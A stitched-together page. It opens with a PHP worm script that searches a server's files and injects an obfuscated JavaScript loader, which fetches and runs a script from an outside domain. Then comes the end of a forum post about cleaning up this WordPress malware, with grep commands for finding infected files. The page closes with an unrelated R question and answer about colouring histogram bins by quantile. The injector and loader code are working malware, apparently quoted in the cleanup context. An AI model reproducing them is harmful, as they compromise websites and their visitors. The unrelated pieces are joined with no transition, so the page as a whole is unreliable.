<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))> -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';
$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
#system("chmod 777 ".$f);
#file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo $f;
}
}
}
echo ":#009009#:";
It's important that you don't use the Duplicator plugin, as it seems it has a SQL injection hole; if you do have it in your system, remove it.
You can use the grep command to identify the infected files like this:
sudo grep -rl "examhome.net" /var/www/html/ | more
sudo grep -r "eval(String.fromCharCode(118, 97 " /var/www/html/ | more
And finally, using the grep and sed commands, you can identify and replace the infected code with a space.
I really hope this helps others solve this issue. It's not a final solution, since this malware worm is being updated and I'm still investigating this issue.
Dave
Disclaimer : Use of the information in this post is your responsibility only!
I am trying to do a simple hist plot and colour the bins by quantile.
I was wondering why, when the bin size changes, the colours get all messed up.
Maybe I am not doing it right from the beginning.
The quantiles are
quantile(x)
0% 25% 50% 75% 100%
0.00 33.75 58.00 78.25 123.00
Then I am setting the colours with the quantile values
k = ifelse(test = x <= 34, yes = "#8DD3C7",
no = ifelse(test = (x > 34 & x <= 58), yes = "#FFFFB3",
no = ifelse(test = (x > 58 & x <= 79), yes = "#BEBADA",
no = ifelse(test = (x > 79), yes = "#FB8072", 'grey'))) )
Then when I plot with larger bin, I get :
hist(dt, breaks = 10, col = k)
Which seems right, even though the last bin is wrong (?!).
But when I try with smaller bins, the colours are not right.
Could someone help me understand why it is wrong? Or if my code is wrong?
The x in question
x = c(23, 23, 16, 16, 34, 34, 43, 43, 97, 97, 63, 63, 39, 39, 29,
29, 63, 63, 48, 48, 7, 7, 80, 80, 69, 69, 110, 110, 103, 103,
43, 43, 39, 39, 46, 46, 14, 14, 56, 56, 76, 76, 52, 52, 18, 18,
32, 32, 66, 66, 70, 70, 26, 26, 40, 40, 105, 105, 62, 62, 51,
51, 58, 58, 37, 37, 55, 55, 42, 42, 11, 11, 89, 89, 55, 55, 109,
109, 49, 49, 27, 27, 96, 96, 27, 27, 65, 65, 74, 74, 17, 17,
33, 33, 89, 89, 63, 63, 18, 18, 25, 25, 36, 36, 108, 108, 3,
3, 52, 52, 83, 83, 74, 74, 56, 56, 99, 99, 6, 6, 25, 25, 51,
51, 4, 4, 100, 100, 17, 17, 44, 44, 23, 23, 70, 70, 85, 85, 14,
14, 22, 22, 89, 89, 45, 45, 2, 2, 29, 29, 14, 14, 69, 69, 96,
96, 10, 10, 58, 58, 97, 97, 54, 54, 60, 60, 65, 65, 2, 2, 54,
54, 4, 4, 28, 28, 107, 107, 74, 74, 72, 72, 71, 71, 42, 42, 92,
92, 64, 64, 39, 39, 111, 111, 72, 72, 73, 73, 58, 58, 41, 41,
56, 56, 73, 73, 18, 18, 73, 73, 36, 36, 60, 60, 49, 49, 47, 47,
95, 95, 19, 19, 8, 8, 7, 7, 38, 38, 38, 38, 38, 38, 28, 28, 79,
79, 53, 53, 30, 30, 19, 19, 14, 14, 53, 53, 68, 68, 39, 39, 42,
42, 87, 87, 33, 33, 18, 18, 77, 77, 83, 83, 19, 19, 14, 14, 7,
7, 32, 32, 94, 94, 30, 30, 55, 55, 89, 89, 30, 30, 45, 45, 84,
84, 38, 38, 59, 59, 73, 73, 77, 77, 22, 22, 55, 55, 31, 31, 52,
52, 20, 20, 26, 26, 62, 62, 55, 55, 46, 46, 26, 26, 49, 49, 22,
22, 65, 65, 67, 67, 73, 73, 29, 29, 88, 88, 86, 86, 76, 76, 32,
32, 12, 12, 19, 19, 14, 14, 8, 8, 63, 63, 63, 63, 65, 65, 84,
84, 34, 34, 42, 42, 26, 26, 75, 75, 68, 68, 28, 28, 95, 95, 17,
17, 76, 76, 33, 33, 91, 91, 93, 93, 80, 80, 89, 89, 64, 64, 81,
81, 98, 98, 47, 47, 70, 70, 46, 46, 11, 11, 92, 92, 69, 69, 95,
95, 51, 51, 87, 87, 61, 61, 50, 50, 47, 47, 35, 35, 31, 31, 39,
39, 19, 19, 81, 81, 35, 35, 68, 68, 68, 68, 67, 67, 57, 57, 7,
7, 9, 9, 23, 23, 50, 50, 89, 89, 41, 41, 54, 54, 53, 53, 57,
57, 89, 89, 32, 32, 40, 40, 48, 48, 35, 35, 15, 15, 90, 90, 1,
1, 17, 17, 53, 53, 73, 73, 76, 76, 59, 59, 45, 45, 68, 68, 21,
21, 37, 37, 33, 33, 51, 51, 61, 61, 31, 31, 15, 15, 23, 23, 29,
29, 45, 45, 96, 96, 87, 87, 37, 37, 104, 104, 50, 50, 58, 58,
103, 103, 91, 91, 72, 72, 73, 73, 27, 27, 60, 60, 23, 23, 99,
99, 28, 28, 78, 78, 27, 27, 82, 82, 63, 63, 34, 34, 84, 84, 62,
62, 2, 2, 99, 99, 22, 22, 85, 85, 39, 39, 47, 47, 66, 66, 17,
17, 74, 74, 45, 45, 70, 70, 87, 87, 28, 28, 97, 97, 89, 89, 33,
33, 50, 50, 79, 79, 86, 86, 69, 69, 91, 91, 75, 75, 52, 52, 76,
76, 13, 13, 71, 71, 42, 42, 20, 20, 28, 28, 56, 56, 69, 69, 16,
16, 47, 47, 60, 60, 45, 45, 72, 72, 78, 78, 107, 107, 4, 4, 64,
64, 88, 88, 9, 9, 3, 3, 10, 10, 92, 92, 41, 41, 5, 5, 35, 35,
31, 31, 24, 24, 70, 70, 47, 47, 41, 41, 32, 32, 92, 92, 90, 90,
75, 75, 3, 3, 78, 78, 30, 30, 93, 93, 60, 60, 17, 17, 25, 25,
48, 48, 70, 70, 69, 69, 66, 66, 76, 76, 104, 104, 31, 31, 72,
72, 56, 56, 64, 64, 92, 92, 68, 68, 102, 102, 100, 100, 27, 27,
40, 40, 47, 47, 29, 29, 76, 76, 78, 78, 20, 20, 13, 13, 10, 10,
113, 113, 17, 17, 61, 61, 69, 69, 65, 65, 16, 16, 100, 100, 5,
5, 18, 18, 24, 24, 54, 54, 41, 41, 64, 64, 66, 66, 90, 90, 29,
29, 97, 97, 37, 37, 42, 42, 84, 84, 37, 37, 74, 74, 65, 65, 12,
12, 49, 49, 31, 31, 108, 108, 9, 9, 93, 93, 71, 71, 39, 39, 70,
70, 79, 79, 92, 92, 60, 60, 104, 104, 79, 79, 103, 103, 38, 38,
93, 93, 46, 46, 66, 66, 79, 79, 51, 51, 31, 31, 65, 65, 93, 93,
25, 25, 22, 22, 91, 91, 123, 123, 51, 51, 34, 34, 64, 64, 31,
31, 24, 24, 74, 74, 57, 57, 95, 95, 83, 83, 28, 28, 56, 56, 72,
72, 43, 43, 18, 18, 66, 66, 32, 32, 17, 17, 67, 67, 10, 10, 44,
44, 66, 66, 57, 57, 89, 89, 57, 57, 55, 55, 18, 18, 78, 78, 82,
82, 103, 103, 110, 110, 92, 92, 54, 54, 35, 35, 8, 8, 53, 53,
86, 86, 45, 45, 99, 99, 19, 19, 84, 84, 94, 94, 92, 92, 80, 80,
69, 69, 45, 45, 22, 22, 59, 59, 9, 9, 41, 41, 72, 72, 24, 24,
117, 117, 79, 79, 57, 57, 29, 29, 96, 96, 47, 47, 23, 23, 64,
64, 33, 33, 48, 48, 80, 80, 30, 30, 42, 42, 10, 10, 42, 42, 68,
68, 46, 46, 58, 58, 39, 39, 82, 82, 79, 79, 80, 80, 89, 89, 85,
85, 24, 24, 106, 106, 40, 40, 90, 90, 69, 69, 92, 92, 84, 84,
82, 82, 86, 86, 80, 80, 73, 73, 78, 78, 39, 39, 27, 27, 55, 55,
100, 100, 63, 63, 21, 21, 46, 46, 94, 94, 6, 6, 45, 45, 66, 66,
94, 94, 52, 52, 78, 78, 59, 59, 86, 86, 67, 67, 76, 76, 54, 54,
47, 47, 37, 37, 76, 76, 32, 32, 49, 49, 87, 87, 122, 122, 27,
27, 82, 82, 51, 51, 50, 50, 22, 22, 32, 32, 99, 99, 77, 77, 54,
54, 29, 29, 82, 82, 80, 80, 85, 85, 30, 30, 57, 57, 41, 41, 50,
50, 65, 65, 51, 51, 109, 109, 89, 89, 50, 50, 6, 6, 66, 66, 42,
42, 48, 48, 88, 88, 67, 67, 89, 89, 109, 109, 80, 80, 64, 64,
64, 64, 95, 95, 76, 76, 76, 76, 78, 78, 44, 44, 51, 51, 19, 19,
29, 29, 31, 31, 75, 75, 11, 11, 10, 10, 64, 64, 80, 80, 29, 29,
73, 73, 67, 67, 38, 38, 27, 27, 23, 23, 74, 74, 79, 79, 49, 49,
78, 78, 29, 29, 59, 59, 70, 70, 8, 8, 24, 24, 39, 39, 80, 80,
27, 27, 29, 29, 36, 36, 94, 94, 86, 86, 35, 35, 84, 84, 99, 99,
83, 83, 92, 92, 81, 81, 58, 58, 2, 2, 64, 64, 75, 75, 29, 29,
53, 53, 58, 58, 11, 11, 38, 38, 83, 83, 108, 108, 86, 86, 56,
56, 12, 12, 84, 84, 76, 76, 38, 38, 54, 54, 37, 37, 27, 27, 61,
61, 83, 83, 37, 37, 59, 59, 81, 81, 76, 76, 70, 70, 61, 61, 101,
101, 77, 77, 68, 68, 74, 74, 83, 83, 70, 70, 93, 93, 53, 53,
64, 64, 89, 89, 1, 1, 53, 53, 67, 67, 81, 81, 71, 71, 51, 51,
85, 85, 35, 35, 67, 67, 53, 53, 37, 37, 31, 31, 65, 65, 82, 82,
47, 47, 60, 60, 81, 81, 21, 21, 94, 94, 75, 75, 92, 92, 113,
113, 93, 93, 84, 84, 77, 77, 82, 82, 84, 84, 58, 58, 83, 83,
84, 84, 80, 80, 1, 1, 49, 49, 73, 73, 22, 22, 99, 99, 74, 74,
28, 28, 33, 33, 74, 74, 91, 91, 83, 83, 70, 70, 99, 99, 69, 69,
38, 38, 68, 68, 47, 47, 61, 61, 47, 47, 70, 70, 85, 85, 20, 20,
100, 100, 3, 3, 49, 49, 100, 100, 85, 85, 54, 54, 8, 8, 3, 3,
47, 47, 46, 46, 45, 45, 27, 27, 87, 87, 20, 20, 24, 24, 51, 51,
50, 50, 105, 105, 73, 73, 13, 13, 18, 18, 51, 51, 75, 75, 55,
55, 62, 62, 85, 85, 56, 56, 51, 51, 66, 66, 74, 74, 63, 63, 2,
2, 81, 81, 85, 85, 19, 19, 16, 16, 83, 83, 36, 36, 79, 79, 63,
63, 41, 41, 45, 45, 76, 76, 62, 62, 67, 67, 74, 74, 92, 92, 47,
47, 41, 41, 80, 80, 57, 57, 100, 100, 66, 66, 58, 58, 65, 65,
59, 59, 20, 20, 54, 54, 10, 10, 79, 79, 64, 64, 106, 106, 44,
44, 28, 28, 41, 41, 49, 49, 80, 80, 61, 61, 20, 20, 75, 75, 59,
59, 93, 93, 32, 32, 38, 38, 30, 30, 41, 41, 8, 8, 8, 8, 54, 54,
56, 56, 83, 83, 81, 81, 77, 77, 42, 42, 59, 59, 11, 11, 21, 21,
77, 77, 84, 84, 86, 86, 84, 84, 34, 34, 48, 48, 80, 80, 92, 92,
18, 18, 66, 66, 40, 40, 45, 45, 60, 60, 80, 80, 2, 2, 5, 5, 84,
84, 66, 66, 70, 70, 70, 70, 95, 95, 62, 62, 0, 0, 67, 67, 61,
61, 71, 71, 73, 73, 82, 82, 45, 45, 54, 54, 43, 43)
It is because you misunderstand the col argument of hist.
The col argument is a vector where col[i] is the colour of the ith bar of the histogram.
Your k vector has one element per element of x, which is many more than the number of bars in the histogram.
In the first case, only the first 13 elements of k are used to colour the bars (in that order), since there are only 13 bars. In the second case, the first n elements of k are used to colour the bars, where n is the number of bars (see how the first 13 bars of the small-bin histogram have the same colour as the first 13 of the first histogram?).
If you want to colour the bars by quantile, you will have to work out how many bars are in each quantile (not how many data points), and create your k like that.
To do this, you need to know the histogram breaks - the breakpoints of your bins. The output of hist returns an object where you can get the breakpoints and so on - see ?hist.
# do the histogram counts to get the break points
# don't plot yet
h <- hist(x, breaks=20, plot=F) # h$breaks and h$mids
To work out the colour the bar should be, you can use either the starting coordinate of each bar (all but the last element of h$breaks), the ending coordinate of each bar (all but the first element of h$breaks) or the midpoint coordinate of each bar (h$mids). Set your colours like you did above.
The findInterval(h$mids, quantile(x), ...) works out which quantile each bar is in (determined by the bar's midpoint); it returns an integer with which interval it is in, or 0 if it's outside (though by definition every bar of the histogram is between the 0th and 100th quantile, so technically your "grey" colour is not ever used). rightmost.closed makes sure the 100% quantile value is included in the top-most colour bracket. The cols[findInterval(...)+1] is just a cool/tricksy way to do your ifelse(h$mids <= ..., "#8DD3C7", ifelse(h$mids <= ..., .....)); you could do it the ifelse way if you prefer.
cols <- c('grey', "#8DD3C7", "#FFFFB3", "#BEBADA", "#FB8072")
k <- cols[findInterval(h$mids, quantile(x), rightmost.closed=T, all.inside=F) + 1]
# plot the histogram with the colours
plot(h, col=k)
Have a look at k - it is only as long as the number of bars in the histogram, rather than as long as the number of datapoints in x.